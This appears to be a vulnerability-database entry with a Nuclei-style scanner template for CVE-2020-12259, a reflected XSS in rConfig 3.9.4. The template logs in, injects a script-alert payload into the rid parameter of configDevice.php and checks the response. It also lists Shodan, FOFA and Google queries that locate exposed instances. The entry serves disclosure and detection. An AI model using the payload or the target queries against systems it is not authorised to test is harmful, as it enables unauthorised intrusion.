漏洞描述
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
CVE-2020-12259: rConfig 3.9.4 - Cross-Site Scripting
PoC代码[已公开]
id: CVE-2020-12259
info:
name: rConfig 3.9.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12259
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-12259
cwe-id: CWE-79
epss-score: 0.65806
epss-percentile: 0.98461
cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 3
vendor: rconfig
product: rconfig
shodan-query:
- http.title:"rConfig"
- http.title:"rconfig"
fofa-query: title="rconfig"
google-query: intitle:"rconfig"
tags: cve2020,cve,rconfig,authenticated,xss
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition: and
# digest: 4a0a0047304502202070a387486324c7327ec747b2c13d36875bebcfe00cb7aa6aabf8e3fd8ca4bf0221008a6ceeacf758bb5fb08f69b9a29881a3dd7546aed25d8bf45290c4bdf757d10a:922c64590222798bb761d5b6d8e72950